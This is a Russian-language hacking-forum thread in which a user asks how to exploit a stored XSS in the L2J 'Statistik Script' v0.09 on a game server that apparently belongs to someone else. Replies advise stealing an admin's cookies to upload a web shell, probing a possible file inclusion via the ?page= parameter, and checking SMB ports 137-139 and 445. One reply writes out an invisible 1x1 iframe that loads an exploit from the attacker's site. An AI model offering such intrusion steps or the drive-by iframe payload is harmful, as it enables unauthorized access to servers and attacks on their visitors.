Люди ... подскажите, вот нашел я активную XSS на L2J 'Statistik Script' v0.09, как мне ее заюзать, а лучше где можно почитать побольше инфы про активные XSS ... (есть сплоит для этого движка вроде, но как его впарить - хз) ...

http://forum.antichat.ru/showthread.php?t=20140

Забавно, человек нашёл активную ксс, но не умеет её юзать=]]

загадка природы =\

A110ut, мб ошибка? :D шучу)

зы оффтоп)

ЖЖоте :) ...Как я понял, с помощью XSS можно спереть только куки, так? С их помощью нельзя например залить шел на сервак? + в это движке есть уязвимость http://***.**.**/?page=index.php? -->все тормозить начинает и страницу бажит ... Что я могу с ее помощью сделать? (если вы конечно понимаете про что я =) ...

Как я понял, с помощью XSS можно спереть только куки, так? С их помощью нельзя например залить шел на сервак?
Если это куки админа какого нибудь нормального сайта (в данном случае имеется в виду админа не сайта стоящего на беспл. хостинге, т.к. там чаще всего запрещён пхп) то шелл залить можно спокойно через админку.
+ в это движке есть уязвимость http://***.**.**/?page=index.php? -->все тормозить начинает и страницу бажит ...
Если идёт такой запрос, вместо index.php подставь test.php , или любое другое название, главное что бы файл отсутствовал на сервере. И посмотри на результат.

1) вот именно что сайт (скрипт) находится в LAN, и там я админку не нашел, хоть есть форма регистрации и авторизации, это стандартный игровой сервер ''Линейки''
2) пробывал разные и test.php и др., но бажит только при значении ?page=index.php? ... Видел даже сплоит для этого движка, но как им пользоваться -- хз :( ... и в описании есть только типо используеться баг при помоще именно ?page=index.php? (этой страницы наверное не существует, хотя ..)
PS .. Использовать пассивную XSS не могу, т.к. там нету даже типо "почты" ...

Дык кто что может посоветовать по этому поводу, движок L2J 'Statistik Script' v0.09, сервер XPюша SP2, есть вот этот "баг" с параментром ?page= и страницей к нему index.php? ...
Как я понял это php-inj =) ...

ктоме активной хсс можно также если у тебя есть сплоит вписть такой код


<iframe src='САЙТ ГДЕ ЛЕЖЫТ ТВОЙ СПЛОИТ' width='1' height='1' style='visibility: hidden;'></iframe>


Но все нормальные сплоиты стоят деньги.. :)

<iframe src='САЙТ ГДЕ ЛЕЖЫТ ТВОЙ СПЛОИТ' width='1'
это че за нах? 0.о

-=kas@t1k=- Говоришь есть сплойт - используй его.
Есть xss - используй ее.
Есть подозрение на локальный инкулуд - попытайся использовать.
Все статьи о том что и как есть на этом форуме - что тебе от нас то надо?

чото ты фантазируеш ... а какие папки открыты для просмотра ?

ground_zero, открыты папки: index/
/test/
/icons/
/main/
/main/css/
/ss/
/acm/
/cc/
/forum/
, из них заблокированные (форум, пишет типо на разработке)

понятно ... ты xspiderom сканил наверное ?
я это к тому какие порты открыты ? если 137-39 445 проблем вообще не должно возникнуть ...
или же подожди пока установят форум и используй свои xss но я думаю поскольку форточка работает под сервер минимум один из дисков имеет доступ из сети и из этова надо плясать ... полазь по папкам которые тебе дают смотреть там может быть много интереснова .
вот статейка на досуге http://www.fssr.ru/hz.php?name=News&file=article&sid=1023

Abra>>это че за нах? 0.о

Учи хтмл.) Обясняє ето ИФРЕЙМ загружен окно так чтоб эго небыло видно, а сайт куда он сылается там лежыт сплоит, а вот что такое сплоит ищи сам.)))))

Ок, спасибо (жалко не могу ещё ставить + ) ..